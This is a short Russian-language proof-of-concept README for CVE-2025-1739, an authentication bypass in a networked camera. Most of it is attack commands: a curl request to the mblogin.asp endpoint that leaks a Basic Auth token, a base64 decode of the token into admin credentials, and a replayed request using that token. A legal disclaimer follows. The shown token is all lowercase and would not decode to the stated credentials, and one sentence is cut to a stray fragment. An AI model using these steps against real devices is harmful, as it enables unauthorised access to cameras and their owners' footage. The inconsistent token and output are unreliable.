
0day PoC для CVE-2025-1739
| CVE | CVSS v3.1 | Балл | CWE | Тип |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Обход аутентификации через утечку Basic Auth |
Камера передает валидный токен Basic Authentication в кодировке Base64 через эндпоинт mblogin.asp. Этот токен можно тривиально декодировать и повторно использовать для получения несанкционированного доступа к устройству — знание пароля не требуется.
curl -u admin:whatever http://<IP_КАМЕРЫ>:<ПОРТ> --request-target en/mobile/mblogin.asp
Ответ содержит валидный токен Basic Auth:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Вывод: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<IP_КАМЕРЫ>:<ПОРТ>/
activex_pal.asp и mblogin.asp.Этот репозиторий предназначен только для образовательных и авторизованных исследований в области безопасности. Авторы не несут ответственности за любое неправомерное использование. Всегда получайте явное разрешение перед тестированием любого устройства.